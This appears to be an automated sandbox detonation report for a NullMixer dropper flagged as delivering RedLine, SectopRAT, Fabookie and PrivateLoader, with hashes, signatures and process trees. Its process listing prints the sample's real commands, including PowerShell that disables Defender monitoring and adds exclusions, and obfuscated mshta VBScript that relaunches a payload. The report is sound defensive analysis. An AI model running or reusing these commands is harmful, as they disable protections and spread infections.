SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2744-155-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4516-160-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-HKIP4.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2232-159-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/1948-174-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1948-179-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-178-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1948-177-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-170-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1948-176-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2764-185-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4868-196-0x0000000005400000-0x000000000543C000-memory.dmp

memory/4868-195-0x00000000054D0000-0x00000000055DA000-memory.dmp

memory/4868-194-0x00000000053A0000-0x00000000053B2000-memory.dmp

memory/3852-197-0x0000000006AA0000-0x0000000006AD2000-memory.dmp

memory/3852-208-0x0000000006A80000-0x0000000006A9E000-memory.dmp

memory/3852-198-0x000000006EA30000-0x000000006EA7C000-memory.dmp

memory/4868-188-0x0000000005840000-0x0000000005E58000-memory.dmp

memory/1608-193-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed0968d19e5ec37794.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4868-184-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3852-209-0x00000000076B0000-0x0000000007753000-memory.dmp

memory/852-210-0x000000006EA30000-0x000000006EA7C000-memory.dmp

memory/3852-213-0x0000000007800000-0x000000000781A000-memory.dmp

memory/3852-212-0x0000000007E40000-0x00000000084BA000-memory.dmp

memory/3852-227-0x0000000007880000-0x000000000788A000-memory.dmp

memory/3852-228-0x0000000007A70000-0x0000000007B06000-memory.dmp

memory/3852-229-0x0000000007A00000-0x0000000007A11000-memory.dmp

memory/3852-230-0x0000000007A30000-0x0000000007A3E000-memory.dmp

memory/3852-243-0x0000000007A40000-0x0000000007A54000-memory.dmp

memory/3852-244-0x0000000007B40000-0x0000000007B5A000-memory.dmp

memory/3852-245-0x0000000007B20000-0x0000000007B28000-memory.dmp

memory/3852-248-0x0000000073640000-0x0000000073DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9766eada4001f2c97df052619c080b1d
SHA1 06c7382a24ce7789b963e9fc45cd36167453ea74
SHA256 e701766f82fdfa3bb8c329dfa0ebdd8c00978796748a7292cdfe87d831101e23
SHA512 7146d321851989bd5925202e0efaf7ceee5b151420c33624bee854870d5ae6f9983f977446af60a2eeac0cc107e60f4e5e229256f98b3808bb95a1fc70bcf5a7

memory/852-253-0x0000000073640000-0x0000000073DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PUVMYbL.81

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Fbu1EQ9.~I

MD5 b1c69eec40db9d006f8b4df8ac3c038e
SHA1 4fc32d07029329e1e6c374b6af8d1925b1f64546
SHA256 5472aecb24e88b33c5455b9fe0617db16e2ced8016c4655a01c2eb44341671e5
SHA512 e7b4abc277c7901713f33285df92d64d26d1327943f775faf9d353401bafb7b0c9dff1ef519771bd417eec85155f9eeff74fb22976595d0e6d3472b6d17e3f9d

C:\Users\Admin\AppData\Local\Temp\RarSFX1\nPI8.L

MD5 e99d5f78660e8ea9d09045c7f1cba42c
SHA1 43ab1072c97572f4e8caefdcbe2d5aa211fd3087
SHA256 3ab51aa79dc557f84729de1001f2ade7bd3900a3a953045de76124aa5e989b98
SHA512 01fc6d11d6a70b352a89f27357323fd3c4b5d93bf3e6a5ee57ba0fa497b2c2665dd33dd0791a85db718debfc88b0b5a44c123964d2460f73e5caf8128b79b831

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Y2Yadq.8~

MD5 6acc22b9c1abe535c6feac6a79db1a18
SHA1 eb94c578b2e6c1bae8a75027f08dcf513e8fb1b9
SHA256 e3870b1f5a9c3be9041d873253e6b0bd89c3fcf05a1a8469ac0e900bc49976ef
SHA512 f99cdc1ff6bb82f73de85144b5be359b661f4bb820f3763d80314357fb7eb5fba812a0d055242e84f14381c4db4caa8fea461782e406e60685082cb8d8e06adf

C:\Users\Admin\AppData\Local\Temp\RarSFX1\lNOSCc5X.Dt

MD5 36fb32e67fa42636817aca7805b49800
SHA1 ae6bdd4bafe6b4a8efeb0f98ac82d1ed4ef07164
SHA256 b040b87c723d23d79034a35fdc82c1f3de3052b489bb7b63e5a505afc5cb3e56
SHA512 56ff53ce8c397867a0ad2f699d3e4441ef0695685636f702db93cb62ffc1c75d33559a92a9286c9f875f2ab2f77034579cc578da427c275c95503edaf78fc42e

C:\Users\Admin\AppData\Local\Temp\RarSFX1\490lw~.x

MD5 6ba17599a0544b52b5ea5ae9d261658f
SHA1 73637edb407d1a8cb80836b19602611cc71dcdf7
SHA256 2cfefd85953f6aab43cd102651b0a130dbefe37790fa4ca775539c497aa52168
SHA512 5a0424546eb2609128812759fc0d49491562ffdc318597d9b6ef80544fd5d9e70083c91f0313e0bb6c934c5c3201a7a4f6f662b049c543ffe3765d8c665f91c2

C:\Users\Admin\AppData\Local\Temp\RarSFX1\B0zcq1x.o

MD5 a6b49368224db5ac48fea0e7215b39d9
SHA1 7385c9cae70f58842c8337ddb038641515e71313
SHA256 fe29f2f6d0ea68365d1e4cf8dab5d6fbf3ea1683964bc1027299069251052262
SHA512 7354e6ba9e478cb40d5efbc392cc911c05b9065bb01c05dfbafaf0ac0a609a07df14b4eb7ff4f18d11022d4c767e7c356a1f9510a249b399fe6b88ed82976e03

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Temp\_enU.W

MD5 13d4be61d9d3c7da927d482b449ff09e
SHA1 57fab8c699c46ff55b74794027201210c001dd0b
SHA256 848085bcebccf4cb84fc3b87fe2d6e38b0d518713146bda312570b82148fa324
SHA512 ac59a4ff77d1d6059af0d20cc91ba9290c9f3116036dcca76bc2a8842137d1db5b5a4a988d7bd269b7072b1f136f5448e51f28bab8f105bcf9234cd471e0b378

memory/4076-264-0x0000000003340000-0x00000000033E6000-memory.dmp

memory/4076-265-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/4076-267-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/4076-268-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/3028-269-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1056-270-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4076-271-0x0000000000400000-0x000000000055D000-memory.dmp

memory/4076-280-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/4076-281-0x0000000003490000-0x000000000423C000-memory.dmp

memory/4076-283-0x0000000004240000-0x00000000042CC000-memory.dmp

memory/4076-287-0x00000000042D0000-0x0000000004358000-memory.dmp

memory/4076-284-0x00000000042D0000-0x0000000004358000-memory.dmp

memory/4076-288-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

memory/4076-289-0x0000000000CC0000-0x0000000000CC4000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted 2024-11-10 17:24

Reported 2024-11-10 17:27

Platform win7-20240903-en

Max time kernel 150s

Max time network 152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe

Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$70190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 272

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed0911cd5800a45.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

